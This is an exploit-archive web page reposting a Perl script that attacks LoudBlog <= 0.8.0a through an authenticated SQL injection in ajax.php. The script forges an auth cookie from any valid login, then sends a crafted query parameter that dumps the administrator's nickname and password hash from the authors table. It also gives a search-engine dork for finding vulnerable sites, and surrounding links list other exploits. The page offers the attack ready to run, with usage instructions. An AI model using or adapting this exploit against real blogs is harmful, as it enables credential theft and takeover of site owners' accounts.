首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth)
来源:www.vfcocus.net 作者:Xianur0 发布时间:2008-10-23  
#!/usr/bin/perl
# This Exploit requires a valid user name and password of an account regardless of the permissions
#
# Author: Xianur0
# Affected: All Versions
# Bug: SQL Injection
#
# Doorks:
#  allintext: "powered by LoudBlog"


  use HTTP::Request::Common qw(POST);
  use LWP::UserAgent;
  use Digest::MD5 qw(md5_hex);
  $ua = LWP::UserAgent->new;

print "\n             LoudBlog Exploit All Version By Xianur0\n\n";
$uri = $ARGV[0];
$id = $ARGV[1];
$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
$md5 = md5_hex($ARGV[2]).":".md5_hex($password);

  my $req = POST $uri.'/loudblog/ajax.php',
                [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17');
$req->header('Cookie' => 'lbauth='.$md5);
$res = $ua->request($req);
  print $res->content."\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·LibSPF2 < 1.2.8 DNS TXT Record
·GoodTech SSH (SSH_FXP_OPEN) Re
·Exploits Asterisk 1.4,1.6 et.
·FreeSSH version 1.2.1 denial o
·Opera 9.52/9.60 Stored Cross S
·CSPartner 1.0 (Delete All User
·Opera <= 9.60 Stored Cross Sit
·SilverSHielD 1.0.2.34 (opendir
·freeSSHd 1.2.1 sftp rename Rem
·MindDezign Photo Gallery 2.2 A
·Google-php-include-bugs search
·CSSH is a proof of concept CSS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved